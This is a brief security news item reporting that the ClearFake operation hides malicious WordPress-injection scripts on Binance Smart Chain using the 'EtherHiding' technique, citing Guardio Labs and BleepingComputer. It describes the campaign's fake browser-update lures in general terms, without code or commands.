BleepingComputer reports that malicious scripts for compromising WordPress sites have been concealed in the blockchain by the ClearFake threat operation using the new EtherHiding code distribution technique that leverages the Binance Smart Chain in a bid to better evade detection.
Vulnerable WordPress sites have been targeted with script injections that load the BSC JS library, which then facilitates retrieval and injection of malicious blockchain-stored scripts before prompting third-stage payload downloads from the command-and-control server, a report from Guardio Labs revealed. Such payloads enable fraudulent site overlays urging browser updates, which when clicked would redirect to sites for downloading a malicious executable.
Such an attack technique by ClearFake comes after the operation used various hijacked WordPress sites to facilitate malicious injections through Cloudflare Worker hosts during the past two months.
"While their initial method of hosting code on abused Cloudflare Worker hosts was taken down, they've quickly pivoted to take advantage of the decentralized, anonymous, and public nature of blockchain. This campaign is up and harder than ever to detect and take down," said Guardio Labs.
Cloud Security, Security Staff Acquisition & Development
Malicious blockchain scripts concealed with Binance Smart Chain abuse
An In-Depth Guide to Cloud Security
Get essential knowledge and practical strategies to fortify your cloud security.
Related Events
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
You can skip this ad in 5 seconds